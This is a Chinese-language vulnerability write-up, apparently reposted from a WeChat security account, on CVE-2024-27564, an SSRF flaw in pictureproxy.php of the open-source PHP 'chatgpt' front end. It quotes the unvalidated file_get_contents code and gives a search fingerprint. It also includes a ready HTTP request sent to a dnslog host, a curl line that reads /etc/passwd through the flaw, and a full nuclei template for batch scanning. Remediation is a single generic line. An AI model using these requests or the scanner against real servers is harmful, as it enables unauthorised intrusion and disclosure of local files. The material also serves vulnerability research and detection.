免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
chatgpt pictureproxy.php SSRF漏洞
02
—
漏洞影响
chatgpt
开源地址如下:
https://github.com/dirk1983/chatgpt
03
—
漏洞描述
chatgpt是全网最易部署,响应速度最快的ChatGPT环境。PHP版调用OpenAI接口进行问答和画图,采用Stream流模式通信,一边生成一边输出。前端采用EventSource,支持Markdown格式解析,支持公式显示,代码有着色处理,支持画图。页面UI简洁,支持上下文连续会话。
chatgpt 的 pictureproxy.php 接口处没有对url参数进行校验,攻击者可以通过url参数注入任意URL让应用发出任意请求。
存在漏洞的代码如下
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
04
—
icon_hash="-1999760920"
05
—
漏洞复现
向靶场发送如下数据包,其中http://hbwqkb.dnslog.cn是dnslog地址
GET /pictureproxy.php?url=http://hbwqkb.dnslog.cn HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
dnslog收到请求
漏洞复现完成
如果未将OPEN basedir配置为限制请求可以操作的目录,则还可能导致任意本地文件读取。
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/passwd
06
—
批量扫描 poc
nuclei poc文件内容如下
id: CVE-2024-27564
info:
name: chatgpt pictureproxy.php SSRF漏洞
author: fgz
severity: high
description: |
的 pictureproxy.php 接口处没有对url参数进行校验,攻击者可以通过url参数注入任意URL让应用发出任意请求。
reference:
https://avd.aliyun.com/detail?id=AVD-2024-27564
metadata:
1 :
icon_hash="-1999760920" :
verified: true
tags: CVE-2024,ssrf,chatgpt
requests:
raw:
|
GET /pictureproxy.php?url=http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0 :
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 :
gzip, deflate, br :
Connection: close
1 :
matchers:
type: dsl
dsl:
contains(interactsh_protocol, "dns")
condition: and
07
—
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
08
—
新粉丝
原文始发于微信公众号(AI与网安):CVE-2024-27564
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论